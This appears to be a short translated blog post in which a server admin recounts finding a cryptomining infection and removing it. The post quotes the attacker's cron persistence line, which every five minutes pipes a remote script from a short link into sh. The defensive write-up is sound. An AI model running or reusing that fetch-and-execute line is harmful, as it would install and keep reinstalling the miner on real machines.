Linux server is hacked, CPU is full

Here are the process and mining files:

Write your own script to kill all processes and delete source files.

It was found that just after the script was executed, a lot of processes appeared again; the source files and processes were all killed, where to execute the command?

In the scheduled task, it is found that the script will be downloaded remotely on a regular basis

*/5 * * * * curl -sL https://lnk0.com/BtoUt4 | sh

Delete the timed task and find that the whole world is quiet.

However, it didn't take long for it to happen again, and it was really hard to prevent (very annoying).

So stop the scheduled task service, and disable the remote download script ip. This time I ran all night and didn't show up again.

 

[Reference]: https://www.v2ex.com/t/447200#reply32

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=325062506&siteId=291194637